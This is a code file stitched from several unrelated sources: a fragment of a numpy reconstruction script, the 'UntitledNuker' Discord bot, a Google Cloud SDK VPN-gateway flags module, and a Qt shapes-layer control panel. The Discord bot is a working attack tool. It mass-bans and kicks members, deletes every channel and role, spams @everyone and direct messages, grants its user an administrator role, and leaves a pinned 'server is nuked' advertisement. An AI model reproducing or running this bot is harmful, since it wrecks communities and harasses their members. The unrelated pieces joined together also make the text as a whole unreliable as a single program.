    sino_res_images = np.vstack( [sino_res[:,i,:] for i in range(sino_res.shape[1])] )
    sino_res_images = np.expand_dims(sino_res_images, axis=2)
    np.save('reconstructed_volumes/reconstructed_volume_'+str(i)+'.npy', vol)
    utils.save_as_vtk_voxel_volume('reconstructed_volumes/reconstructed_volume_'+str(i), vol)
    utils.save_as_vtk_voxel_volume('reconstructed_volumes/reconstructed_sino_residual_'+str(i), sino_res_images)
|
<reponame>ICEGXG/UntitledNuker
import json
import os
import traceback
import colorama
import discord
import requests
from colorama import Fore
from discord.ext import commands
# Enable ANSI colour handling and clear the console.
# NOTE(review): "cls" exists only on Windows; on other shells this prints
# an error -- confirm intended platform.
colorama.init()
os.system('cls')
# Read the tool version from version.txt (one directory up as a fallback);
# an empty version disables the update check performed later.
try:
    with open("version.txt") as data:
        version = data.readline()
except FileNotFoundError:
    try:
        with open("../version.txt") as data:
            version = data.readline()
    except FileNotFoundError:
        version = ""
# Shared Discord embed colour and coloured console message templates.
embedColor = 0x5c92ff
colors = {"main": Fore.CYAN,
          "white": Fore.WHITE,
          "red": Fore.RED}
msgs = {"info": f"{colors['white']}[{colors['main']}i{colors['white']}]",
        "+": f"{colors['white']}[{colors['main']}+{colors['white']}]",
        "error": f"{colors['white']}[{colors['red']}e{colors['white']}]",
        "input": f"{colors['white']}{colors['main']}>>{colors['white']}",
        "pressenter": f"{colors['white']}[{colors['main']}i{colors['white']}] Press ENTER to exit"}
async def msg_delete(ctx):
    """Try to delete the message that triggered a command.

    Deletion can fail (missing permission, message already gone); the
    failure is reported on the console but never propagated.

    Bug fix: the former bare "except:" also swallowed KeyboardInterrupt
    and SystemExit; the handler is narrowed to Exception.
    """
    try:
        await ctx.message.delete()
    except Exception:
        print(f"{msgs['error']} Can't delete your message")
def userOrBot():
    """Return True when the global token authenticates as a user account.

    Calls Discord's /users/@me with the raw token; a 200 response means
    the token worked as-is.  NOTE: a bot token would presumably need the
    "Bot " prefix, hence a plain 200 is taken to indicate a user account.
    """
    response = requests.get("https://discord.com/api/v8/users/@me",
                            headers={"Authorization": f'{token}'})
    return response.status_code == 200
def checkVersion():
    """Compare the local version against version.txt on GitHub master.

    Returns "" (no local version), "(Latest)", "(Update available)" or
    "(Update check failed)".
    """
    if version == "":
        return ""  # version.txt was not found at startup -> skip the check
    req = requests.get(
        "https://raw.githubusercontent.com/ICEGXG/UntitledNuker/master/version.txt")
    if req.status_code != requests.codes.ok:
        return "(Update check failed)"
    gitVersion = req.text.rstrip()
    return "(Latest)" if version == gitVersion else "(Update available)"
def checkActivity(type, text):
if type == "playing":
return discord.Game(name=text)
elif type == "listening":
return discord.Activity(type=discord.ActivityType.listening, name=text)
elif type == "watching":
return discord.Activity(type=discord.ActivityType.watching, name=text)
else:
return None
print(f'{colors["main"]}\n\n __ __ __ __ ______ __ ______ __ ______ _____ ' + "\n"
r' /\ \/\ \/\ "-.\ \/\__ _/\ \/\__ _/\ \ /\ ___\/\ __-. ' + "\n"
r' \ \ \_\ \ \ \-. \/_/\ \\ \ \/_/\ \\ \ \___\ \ __\\ \ \/\ \ ' + "\n"
r' \ \_____\ \_\\"\_\ \ \_\\ \_\ \ \_\\ \_____\ \_____\ \____- ' + "\n"
r' \/_____/\/_/ \/_/ \/_/ \/_/ \/_/ \/_____/\/_____/\/____/ ' + "\n"
'\n'
r' __ __ __ __ __ __ ______ ______ ' + "\n"
r' /\ "-.\ \/\ \/\ \/\ \/ / /\ ___\/\ == \ ' + "\n"
r' \ \ \-. \ \ \_\ \ \ _"-\ \ __\\ \ __< ' + "\n"
r' \ \_\\"\_\ \_____\ \_\ \_\ \_____\ \_\ \_\ ' + "\n"
r' \/_/ \/_/\/_____/\/_/\/_/\/_____/\/_/ /_/ '
"\n"
"\n"
"\n"
f"{colors['white']} Author: {colors['main']}ICE#4449\n"
f"{colors['white']} Version: {colors['main']}{version} {checkVersion()}\n"
f"{colors['white']} GitHub: {colors['main']}https://github.com/ICEGXG/UntitledNuker\n\n{colors['white']}")
"""
Fetching prefix, token and owner ID's from config
If there's no config, requests data from the user and creates it
"""
try:
with open(f"config.json", encoding='utf8') as data:
config = json.load(data)
token = config["token"]
prefix = config["prefix"]
owners = config["owners"]
whiteListBool = config["whitelistbool"]
activity = config["activity"]
print(f"{msgs['info']} Loaded config.json")
except FileNotFoundError:
token = input(f"Paste token {msgs['input']} ")
prefix = input(f"Paste prefix {msgs['input']} ")
owners = input(
f"Paste bot's owner ID (If several use ',') {msgs['input']} ")
whiteListYesOrNo = input(
f"Enable whitelisting (y/n) {msgs['input']} ").lower()
whiteListBool = True if whiteListYesOrNo == "y" else False
owners = owners.replace(" ", "")
if "," in owners:
owners = owners.split(",")
owners = list(map(int, owners))
else:
owners = [int(owners)]
activity = {"type": "playing",
"text": f"Untitled Nuker v{version}",
"isenabled": True}
config = {
"token": token,
"prefix": prefix,
"owners": owners,
"whitelistbool": whiteListBool,
"activity": activity
}
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Created config.json")
# shitcode :)
if userOrBot() == True:
print(f"{msgs['info']} Untitled Nuker doesn't support self bots now, it will likely be added in next versions")
print(msgs['pressenter'])
input()
os._exit(0)
if activity["isenabled"]:
activityToBot = checkActivity(activity["type"], activity["text"])
else:
activityToBot = None
bot = commands.Bot(command_prefix=prefix, self_bot=userOrBot(),
activity=activityToBot, intents=discord.Intents.all())
bot.remove_command("help")
def isOwner(ctx):
return ctx.author.id in owners
def isWhitelisted(ctx):
if whiteListBool:
return ctx.author.id in owners
else:
return True
@bot.event
async def on_ready():
print(f"\n\n{colors['main']}" + ("═"*75).center(95) + f"\n{colors['white']}" +
f"Logged in as {bot.user}".center(95) + "\n" +
f"Prefix: {bot.command_prefix}".center(95) + "\n" +
f"Total servers: {len(bot.guilds)}".center(95) + "\n" +
f"Total members: {len(bot.users)} ".center(95) + f"\n{colors['main']}" + ("═"*75).center(95) + f"\n\n{colors['white']}")
@bot.event
async def on_command(ctx):
print(
f"{msgs['info']} Executed {ctx.command} ({colors['main']}{ctx.message.author}{colors['white']})")
@bot.event
async def on_command_error(ctx, err):
errors = commands.errors
if (isinstance(err, errors.BadArgument) or isinstance(err, commands.MissingRequiredArgument)
or isinstance(err, errors.PrivateMessageOnly) or isinstance(err, errors.CheckFailure)
or isinstance(err, errors.CommandNotFound)):
return
elif isinstance(err, errors.MissingPermissions):
print(f"{msgs['error']} Missing permissions")
else:
print(
f'{colors["red"]}\n\n{"".join(traceback.format_exception(type(err), err, err.__traceback__))}{colors["white"]}\n')
@bot.command(name='help')
@commands.check(isWhitelisted)
async def help(ctx):
await msg_delete(ctx)
p = bot.command_prefix
embed = discord.Embed(title="Help", color=embedColor)
embed.set_author(name="<NAME>",
url="https://github.com/ICEGXG/UntitledNuker")
embed.add_field(
name="Nuke", value=f">>> `{p}1 <ban 1/0> <your text>`", inline=False)
embed.add_field(name="Ban everyone", value=f">>> `{p}2`", inline=False)
embed.add_field(name="Kick everyone", value=f">>> `{p}3`", inline=False)
embed.add_field(name="Rename everyone",
value=f">>> `{p}4 <new nickname>`", inline=False)
embed.add_field(name="DM everyone",
value=f">>> `{p}5 <message>`", inline=False)
embed.add_field(name="Spam to all channels",
value=f">>> `{p}6 <amount> <text>`", inline=False)
embed.add_field(name="Spam to current channel",
value=f">>> `{p}7 <amount> <text>`", inline=False)
embed.add_field(name="Delete all channels",
value=f">>> `{p}8`", inline=True)
embed.add_field(name="Delete all roles", value=f">>> `{p}9`", inline=True)
embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(name="Spam with channels",
value=f">>> `{p}10 <amount> <name>`", inline=True)
embed.add_field(name="Spam with roles",
value=f">>> `{p}11 <amount> <name>`", inline=True)
embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(name="Edit server icon",
value=f">>> Image is attachment\n`{p}12`", inline=True)
embed.add_field(name="Edit server name",
value=f">>> `{p}13 <name>`", inline=True)
embed.add_field(name="Get admin",
value=f">>> `{p}14 <name of role>`", inline=False)
# embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(
name="Revive (DM Only)", value=f">>> Creating 1 text channel on server if you deleted all\n`{p}15 <guild id>`", inline=False)
embed.add_field(name="Settings", value=f">>> `{p}settings`")
embed.add_field(name="\u200b\nInfo",
value=f">>> **Untitled Nuker**\nMade by <@404323<PASSWORD>561837066>\nVersion: {version} {checkVersion()}\nGitHub: https://github.com/ICEGXG/UntitledNuker\n", inline=False)
await ctx.message.author.send(embed=embed)
@bot.group(name='settings', aliases=["config"], invoke_without_command=True)
@commands.check(isWhitelisted)
async def settings(ctx):
p = bot.command_prefix
embed = discord.Embed(
title="Settings", description="Available settings\n`Only for owners`", color=embedColor)
embed.set_author(name="Untitled Nuker",
url="https://github.com/ICEGXG/UntitledNuker")
embed.add_field(
name="Prefix", value=f">>> Change prefix\n`{p}settings prefix <prefix>`", inline=False)
embed.add_field(
name="Owners", value=f">>> Add or remove user from owners\n`{p}settings owners <add/remove> <ID/mention>`", inline=False)
embed.add_field(
name="Whitelist", value=f">>> Enable or disable whitelisting\n`{p}settings whitelist <on/off>`", inline=True)
embed.add_field(
name="Activity", value=f">>> Change or disable activity\nAvailable types: `playing`, `listening`, `watching`\n`{p}settings activity <set/off> <type> <text>`", inline=False)
await ctx.message.author.send(embed=embed)
@settings.command(name='prefix')
@commands.check(isOwner)
async def settingsPrefix(ctx, newPrefix):
global config
bot.command_prefix = newPrefix
config['prefix'] = newPrefix
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
await ctx.message.add_reaction('✅')
print(
f"{msgs['info']} Prefix is {colors['main']}{newPrefix}{colors['white']} now")
@settings.command(name='owners')
@commands.check(isOwner)
async def settingOwners(ctx, action, *, users):
global config
users = users.replace('<@!', '')
users = users.replace('>', '')
users = users.replace(" ", "")
if "," in users:
users = users.split(",")
users = list(map(int, users))
else:
users = [int(users)]
if action == "add":
config["owners"] += users
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(
f"{msgs['info']} Added {colors['main']}{str(users)[1:-1]}{colors['white']} to owners")
await ctx.message.add_reaction('✅')
elif action == "remove" or "delete":
for user in users:
config["owners"].remove(user)
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(
f"{msgs['info']} Removed {colors['main']}{str(users)[1:-1]}{colors['white']} from owners")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@settings.command(name='whitelist', aliases=["whitelisting"])
@commands.check(isOwner)
async def settingsWhitelist(ctx, action):
global config
global whiteListBool
if action.lower() == "on" or "enable":
whiteListBool = True
config["whitelistbool"] = True
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Enabled whitelisting")
await ctx.message.add_reaction('✅')
elif action.lower() == "off" or "disable":
whiteListBool = False
config["whitelistbool"] = False
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Disabled whitelisting")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@settings.command(name='activity')
@commands.check(isOwner)
async def settingsActivity(ctx, action, activityType="playing", *, text=f"Untitled Nuker v{version}"):
global config
global activity
if action == "set":
await bot.change_presence(activity=checkActivity(activityType, text))
activity = {"type": activityType,
"text": text,
"isenabled": True}
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Changed activity")
await ctx.message.add_reaction('✅')
elif action == "on" or action == "enable":
await bot.change_presence(activity=checkActivity(activity["type"], activity["text"]))
activity["isenabled"] = True
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Enabled activity")
await ctx.message.add_reaction('✅')
elif action == "off" or action == "disable":
await bot.change_presence(activity=None)
activity["isenabled"] = False
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Disabled activity")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@bot.command(name='1', aliases=["nk", "nuke"])
@commands.check(isWhitelisted)
async def nuke(ctx, ban: bool = True, text: str = "Untitled Nuker"):
await msg_delete(ctx)
"""
Trying to change server icon and name
"""
icon = await ctx.message.attachments[0].read() if ctx.message.attachments else None
await ctx.guild.edit(name=text, icon=icon, banner=icon)
"""
Trying to delete all channels
"""
for ch in ctx.guild.channels:
try:
await ch.delete()
print(f"{msgs['+']} Deleted {ch}")
except:
print(f"{msgs['error']} Can't delete {ch}")
"""
Trying to ban everyone if requested
"""
if ban:
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.ban()
print(f"{msgs['+']} Banned {m}")
except:
print(f"{msgs['error']} can't ban {m}")
else:
print(f"{msgs['info']} {m} is owner")
"""
Trying to delete roles
"""
for r in ctx.guild.roles:
try:
await r.delete()
print(f"{msgs['+']} Deleted {r}")
except:
print(f"{msgs['error']} Can't delete {r}")
try:
embed = discord.Embed(color=embedColor)
embed.add_field(name="This server is Nuked",
value="By Unitled Nuker\nDownload: https://github.com/ICEGXG/UntitledNuker", inline=False)
channel = await ctx.guild.create_text_channel(name="Untitled Nuker")
message = await channel.send(embed=embed)
await message.pin()
except:
pass
@bot.command(name='2', aliases=["be", "baneveryone"])
@commands.check(isWhitelisted)
async def banEveryone(ctx):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.ban()
print(f"{msgs['+']} Banned {m}")
except:
print(f"{msgs['error']} can't ban {m}")
else:
print(f"{msgs['info']} {m} is owner")
@bot.command(name='3', aliases=["ke", "kickeveryone"])
@commands.check(isWhitelisted)
async def kickEveryone(ctx):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.kick()
print(f"{msgs['+']} Kicked {m}")
except:
print(f"{msgs['error']} can't kick {m}")
else:
print(f"{msgs['info']} {m} is owner")
@bot.command(name="4", aliases=["chen"])
@commands.check(isWhitelisted)
async def renameEveryone(ctx, *, name="Untitled Nuker"):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.edit(nick=name)
print(f"{msgs['+']} Changed {m}'s nickname")
except:
print(f"{msgs['error']} Can't change {m}'s nickname")
else:
print(f"{msgs['info']} {m.name} is owner")
@bot.command(name="5", aliases=["dme"])
@commands.check(isWhitelisted)
async def dmEveryone(ctx, *, msg="Untitled Nuker"):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.send(msg)
print(f"{msgs['+']} Message sent to {m}")
except:
print(f"{msgs['error']} Can't send message to {m}")
else:
print(f"{msgs['info']} {m.name} is owner")
@bot.command(name="6", aliases=["sa"])
@commands.check(isWhitelisted)
async def spamToAllChannels(ctx, amount: int = 50, *, text="@everyone Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
for ch in ctx.guild.channels:
try:
await ch.send(text)
print(f"{msgs['+']} Message sent to {ch}")
except:
print(f"{msgs['error']} Can't send message to {ch}")
@bot.command(name='7', aliases=["sc"])
@commands.check(isWhitelisted)
async def spamToCurrentChannel(ctx, amount: int = 50, *, text="@everyone Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
try:
await ctx.channel.send(text)
print(f"{msgs['+']} Message sent to {ctx.channel}")
except:
print(f"{msgs['error']} Can't send message to {ctx.channel}")
@bot.command(name='8', aliases=["dch"])
@commands.check(isWhitelisted)
async def deleteAllChannels(ctx):
await msg_delete(ctx)
for ch in ctx.guild.channels:
try:
await ch.delete()
print(f"{msgs['+']} Deleted {ch}")
except:
print(f"{msgs['error']} Can't delete {ch}")
@bot.command(name='9', aliases=["dr"])
@commands.check(isWhitelisted)
async def deleteAllRoles(ctx):
await msg_delete(ctx)
for r in ctx.guild.roles:
try:
await r.delete()
print(f"{msgs['+']} Deleted {r}")
except:
print(f"{msgs['error']} Can't delete {r}")
@bot.command(name="10", aliases=["sch"])
@commands.check(isWhitelisted)
async def spamWithChannels(ctx, amount: int = 25, *, name="Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
try:
await ctx.guild.create_text_channel(name=name)
print(f"{msgs['+']} Created channel")
except:
print(f"{msgs['error']} Can't create channel")
@bot.command(name="11", aliases=["sr"])
@commands.check(isWhitelisted)
async def spamWithRoles(ctx, amount: int = 25, *, name="Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
try:
await ctx.guild.create_role(name=name)
print(f"{msgs['+']} Created role")
except:
print(f"{msgs['error']} Can't create role")
@bot.command(name='12', aliases=["si"])
@commands.check(isWhitelisted)
async def editServerIcon(ctx):
await msg_delete(ctx)
if ctx.message.attachments:
icon = await ctx.message.attachments[0].read()
else:
return
try:
await ctx.guild.edit(icon=icon)
print(f"{msgs['+']} Changed server icon")
except:
print(f"{msgs['error']} Can't change server icon")
@bot.command(name='13', aliases=["sn"])
@commands.check(isWhitelisted)
async def editServerName(ctx, *, name="Untitled Nuker"):
await msg_delete(ctx)
try:
await ctx.guild.edit(name=name)
print(f"{msgs['+']} Changed server name")
except:
print(f"{msgs['error']} Can't change server name")
@bot.command(name="14", aliases=["ga"])
@commands.check(isWhitelisted)
async def getAdmin(ctx, *, rolename="Untitled Nuker"):
await msg_delete(ctx)
try:
perms = discord.Permissions(administrator=True)
role = await ctx.guild.create_role(name=rolename, permissions=perms)
await ctx.message.author.add_roles(role)
print(f"{msgs['+']} Added admin role to {ctx.message.author}")
except:
print(f"{msgs['error']} Can't add admin role to {ctx.message.author}")
@bot.command(name='15', aliases=["rg"])
@commands.check(isWhitelisted)
@commands.dm_only()
async def reviveGuild(ctx, guildId: int = None):
if guildId:
guild = bot.get_guild(guildId)
try:
await guild.create_text_channel(name="Untitled Nuker")
print(f"{msgs['+']} Revived {guild}")
except:
print(f"{msgs['error']} Can't revive {guild}")
"""
Running bot
"""
try:
bot.run(token, bot=not userOrBot())
except discord.errors.LoginFailure:
print(f'{msgs["error"]} Invalid Token')
print(msgs['pressenter'])
input()
os._exit(0)
except discord.errors.PrivilegedIntentsRequired:
print(f"{msgs['error']} It looks like you didn't enable the necessary intents in the developer portal."
f"Visit {colors['main']}https://discord.com/developers/applications/ {colors['white']}and turn them on.\n")
print(msgs['pressenter'])
input()
os._exit(0)
except Exception as e:
print(f'{colors["red"]}\nAn error occured while logging:\n{"".join(traceback.format_exception(type(e), e, e.__traceback__))}{colors["white"]}\n')
print(msgs['pressenter'])
input()
os._exit(0)
|
<filename>lib/googlecloudsdk/command_lib/compute/vpn_gateways/flags.py
# -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flags and helpers for the compute vpn-gateways commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import completers as compute_completers
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.util.apis import arg_utils
# The default output format for the list sub-command.
DEFAULT_LIST_FORMAT = """\
table(
name,
vpnInterfaces[0].ipAddress:label=INTERFACE0,
vpnInterfaces[1].ipAddress:label=INTERFACE1,
network.basename(),
region.basename()
)"""
class VpnGatewaysCompleter(compute_completers.ListCommandCompleter):
  """A VPN gateway completer for a resource argument.

  Shell completions are produced by running
  `alpha compute vpn-gateways list --uri` against the
  `compute.vpnGateways` collection and parsing the resulting URIs.
  """
  def __init__(self, **kwargs):
    # Forward any extra completer options to the base list-command completer.
    super(VpnGatewaysCompleter, self).__init__(
        collection='compute.vpnGateways',
        list_command='alpha compute vpn-gateways list --uri',
        **kwargs)
def GetVpnGatewayArgument(required=True, plural=False):
  """Builds the positional resource argument for a VPN gateway.

  Args:
    required: bool, whether the argument must be supplied.
    plural: bool, whether multiple VPN gateways may be specified.

  Returns:
    A compute_flags.ResourceArgument for the regional VPN gateway resource.
  """
  vpn_gateway_arg = compute_flags.ResourceArgument(
      resource_name='VPN Gateway',
      custom_plural='VPN Gateways',
      completer=VpnGatewaysCompleter,
      required=required,
      plural=plural,
      regional_collection='compute.vpnGateways',
      region_explanation=compute_flags.REGION_PROPERTY_EXPLANATION)
  return vpn_gateway_arg
def GetVpnGatewayArgumentForOtherResource(required=False):
  """Builds the --vpn-gateway flag used when creating other resources.

  Args:
    required: bool, whether the flag must be supplied.

  Returns:
    A compute_flags.ResourceArgument referencing an HA VPN gateway.
  """
  # Help strings are kept identical to the published flag text.
  short_help = ('Reference to a VPN gateway, this flag is used for creating '
                'HA VPN tunnels.')
  region_explanation = ('Should be the same as region, if not specified, '
                        'it will be automatically set.')
  detailed_help = """\
      Reference to a Highly Available VPN gateway.
      """
  return compute_flags.ResourceArgument(
      name='--vpn-gateway',
      resource_name='VPN Gateway',
      completer=VpnGatewaysCompleter,
      required=required,
      plural=False,
      regional_collection='compute.vpnGateways',
      short_help=short_help,
      region_explanation=region_explanation,
      detailed_help=detailed_help)
def GetPeerVpnGatewayArgumentForOtherResource(required=False):
  """Returns the flag for specifying the peer VPN gateway.

  Args:
    required: bool, whether the --peer-gcp-gateway flag is required.

  Returns:
    A compute_flags.ResourceArgument for the peer-side HA VPN gateway
    (the remote tunnel endpoint for Cloud-to-Cloud HA VPN tunnels).
  """
  return compute_flags.ResourceArgument(
      name='--peer-gcp-gateway',
      resource_name='VPN Gateway',
      completer=VpnGatewaysCompleter,
      plural=False,
      required=required,
      regional_collection='compute.vpnGateways',
      # BUG FIX: the two sentences below were previously concatenated without
      # a separating space, rendering as "...Google Cloud.Either
      # --peer-external-gateway...". Also fixed "High Available" grammar.
      short_help=(
          'Peer side Highly Available VPN gateway representing the remote '
          'tunnel endpoint, this flag is used when creating HA VPN tunnels '
          'from Google Cloud to Google Cloud. '
          'Either --peer-external-gateway or --peer-gcp-gateway must be '
          'specified when creating VPN tunnels from a Highly Available '
          'VPN gateway.'),
      region_explanation=('Should be the same as region, if not specified, '
                          'it will be automatically set.'),
      detailed_help="""\
      Reference to the peer side Highly Available VPN gateway.
      """)
def GetDescriptionFlag():
  """Builds the --description flag for VPN gateway commands.

  Returns:
    A base.Argument carrying the optional textual description.
  """
  description_help = 'An optional, textual description for the VPN gateway.'
  return base.Argument('--description', help=description_help)
def GetInterconnectAttachmentsFlag():
  """Returns the flag for interconnect attachments (VLAN attachments) associated with a VPN gateway.

  Returns:
    A hidden base.Argument accepting a comma-separated list of at most two
    attachment names, one per VPN gateway interface.
  """
  return base.Argument(
      '--interconnect-attachments',
      # At most two attachments: one per VPN gateway interface (0 and 1).
      type=arg_parsers.ArgList(max_length=2),
      hidden=True,
      required=False,
      metavar='INTERCONNECT_ATTACHMENTS',
      help="""\
      Names of interconnect attachments (VLAN attachments) associated with the
      VPN gateway interfaces. You must specify this field when using a VPN gateway
      for IPsec-encrypted Cloud Interconnect. Otherwise, this field is optional.
      For example,
      `--interconnect-attachments attachment-a-zone1,attachment-a-zone2`
      associates VPN gateway with attachment from zone1 on interface 0 and with
      attachment from zone2 on interface 1.
      """)
def GetInterconnectAttachmentRef(resources, name, region, project):
  """Resolves an interconnect attachment name into a resource reference.

  Args:
    resources: The resource registry used to parse the name.
    name: str, name of the interconnect attachment (VLAN attachment).
    region: str, region the attachment lives in.
    project: str, project that owns the attachment.

  Returns:
    A parsed reference in the compute.interconnectAttachments collection.
  """
  parse_params = {'region': region, 'project': project}
  return resources.Parse(
      name, collection='compute.interconnectAttachments', params=parse_params)
def GetStackType():
  """Returns the flag for VPN gateway stack type.

  Returns:
    A base.Argument whose choices enumerate the IP stack types supported on
    the VPN gateway; the server-side default is IPV4_ONLY.
  """
  return base.Argument(
      '--stack-type',
      choices={
          'IPV4_ONLY':
              'Only IPv4 protocol is enabled on this vpn gateway.',
          'IPV4_IPV6':
              'Both IPv4 and IPv6 protocols are enabled on this vpn gateway.',
      },
      # Normalizes the user-supplied choice string to the API enum name.
      type=arg_utils.ChoiceToEnumName,
      help="""\
      The stack type of the protocol(s) enabled on this vpn gateway.
      If not provided, `IPV4_ONLY` will be used.
      """)
|
from collections import Iterable
import numpy as np
from qtpy.QtCore import Qt
from qtpy.QtWidgets import (
QButtonGroup,
QVBoxLayout,
QRadioButton,
QPushButton,
QLabel,
QComboBox,
QSlider,
)
from .qt_base_layer import QtLayerControls, QtLayerProperties
from ..layers.shapes._constants import Mode
class QtShapesControls(QtLayerControls):
    """Qt controls panel for a shapes layer.

    Builds one mutually exclusive radio button per editing mode plus push
    buttons for reordering and deleting shapes, and keeps the checked
    button in sync with the layer's current mode.
    """

    def __init__(self, layer):
        super().__init__(layer)
        # Keep the checked radio button in sync when the layer's mode is
        # changed from anywhere else (keyboard shortcuts, API, etc.).
        self.layer.events.mode.connect(self.set_mode)
        self.select_button = QtModeButton(
            layer, 'select', Mode.SELECT, 'Select mode'
        )
        self.direct_button = QtModeButton(
            layer, 'direct', Mode.DIRECT, 'Direct select mode'
        )
        self.panzoom_button = QtModeButton(
            layer, 'zoom', Mode.PAN_ZOOM, 'Pan/zoom mode'
        )
        self.rectangle_button = QtModeButton(
            layer, 'rectangle', Mode.ADD_RECTANGLE, 'Add rectangles'
        )
        self.ellipse_button = QtModeButton(
            layer, 'ellipse', Mode.ADD_ELLIPSE, 'Add ellipses'
        )
        self.line_button = QtModeButton(
            layer, 'line', Mode.ADD_LINE, 'Add lines'
        )
        self.path_button = QtModeButton(
            layer, 'path', Mode.ADD_PATH, 'Add paths'
        )
        self.polygon_button = QtModeButton(
            layer, 'polygon', Mode.ADD_POLYGON, 'Add polygons'
        )
        self.vertex_insert_button = QtModeButton(
            layer, 'vertex_insert', Mode.VERTEX_INSERT, 'Insert vertex'
        )
        self.vertex_remove_button = QtModeButton(
            layer, 'vertex_remove', Mode.VERTEX_REMOVE, 'Remove vertex'
        )
        self.move_front_button = QtMoveFrontButton(layer)
        self.move_back_button = QtMoveBackButton(layer)
        self.delete_button = QtDeleteShapeButton(layer)
        # Grouping the radio buttons makes the mode selection exclusive.
        self.button_group = QButtonGroup(self)
        self.button_group.addButton(self.select_button)
        self.button_group.addButton(self.direct_button)
        self.button_group.addButton(self.panzoom_button)
        self.button_group.addButton(self.rectangle_button)
        self.button_group.addButton(self.ellipse_button)
        self.button_group.addButton(self.line_button)
        self.button_group.addButton(self.path_button)
        self.button_group.addButton(self.polygon_button)
        self.button_group.addButton(self.vertex_insert_button)
        self.button_group.addButton(self.vertex_remove_button)
        layout = QVBoxLayout()
        layout.setContentsMargins(12, 20, 10, 10)
        layout.addWidget(self.panzoom_button)
        layout.addWidget(self.select_button)
        layout.addWidget(self.direct_button)
        layout.addWidget(self.vertex_insert_button)
        layout.addWidget(self.vertex_remove_button)
        layout.addWidget(self.rectangle_button)
        layout.addWidget(self.ellipse_button)
        layout.addWidget(self.line_button)
        layout.addWidget(self.path_button)
        layout.addWidget(self.polygon_button)
        layout.addWidget(self.move_front_button)
        layout.addWidget(self.move_back_button)
        layout.addWidget(self.delete_button)
        layout.addStretch(0)
        self.setLayout(layout)
        self.setMouseTracking(True)
        # Pan/zoom is the initial mode.
        self.panzoom_button.setChecked(True)

    def mouseMoveEvent(self, event):
        # Surface the current mode in the layer status while hovering.
        self.layer.status = str(self.layer.mode)

    def set_mode(self, event):
        """Check the radio button matching ``event.mode``.

        Raises:
            ValueError: If the mode is not one of the known shape modes.
        """
        mode = event.mode
        if mode == Mode.SELECT:
            self.select_button.setChecked(True)
        elif mode == Mode.DIRECT:
            self.direct_button.setChecked(True)
        elif mode == Mode.PAN_ZOOM:
            self.panzoom_button.setChecked(True)
        elif mode == Mode.ADD_RECTANGLE:
            self.rectangle_button.setChecked(True)
        elif mode == Mode.ADD_ELLIPSE:
            self.ellipse_button.setChecked(True)
        elif mode == Mode.ADD_LINE:
            self.line_button.setChecked(True)
        elif mode == Mode.ADD_PATH:
            self.path_button.setChecked(True)
        elif mode == Mode.ADD_POLYGON:
            self.polygon_button.setChecked(True)
        elif mode == Mode.VERTEX_INSERT:
            self.vertex_insert_button.setChecked(True)
        elif mode == Mode.VERTEX_REMOVE:
            self.vertex_remove_button.setChecked(True)
        else:
            # BUG FIX: message previously misspelled as "recongnized".
            raise ValueError("Mode not recognized")
class QtModeButton(QRadioButton):
    """Radio button that switches the shapes layer into a given Mode."""

    def __init__(self, layer, button_name, mode, tool_tip):
        super().__init__()
        self.mode = mode
        self.layer = layer
        self.setToolTip(tool_tip)
        self.setChecked(False)
        # The 'mode' property is read by the stylesheet to pick the icon.
        self.setProperty('mode', button_name)
        self.toggled.connect(lambda state=self: self._set_mode(state))
        self.setFixedWidth(28)

    # BUG FIX: parameter was named `bool`, shadowing the builtin.
    def _set_mode(self, checked):
        # Block our own handler on the layer's mode event so setting the
        # mode here does not re-enter and fight with the button state.
        with self.layer.events.mode.blocker(self._set_mode):
            if checked:
                self.layer.mode = self.mode
class QtDeleteShapeButton(QPushButton):
    """Push button that deletes the currently selected shapes."""

    def __init__(self, layer):
        super().__init__()
        self.layer = layer
        # Square 28x28 button to match the mode buttons.
        self.setFixedWidth(28)
        self.setFixedHeight(28)
        self.clicked.connect(self.layer.remove_selected)
        self.setToolTip('Delete selected')
class QtMoveBackButton(QPushButton):
    """Push button that sends the selected shapes to the back."""

    def __init__(self, layer):
        super().__init__()
        self.layer = layer
        # Square 28x28 button to match the mode buttons.
        self.setFixedWidth(28)
        self.setFixedHeight(28)
        self.clicked.connect(self.layer.move_to_back)
        self.setToolTip('Move to back')
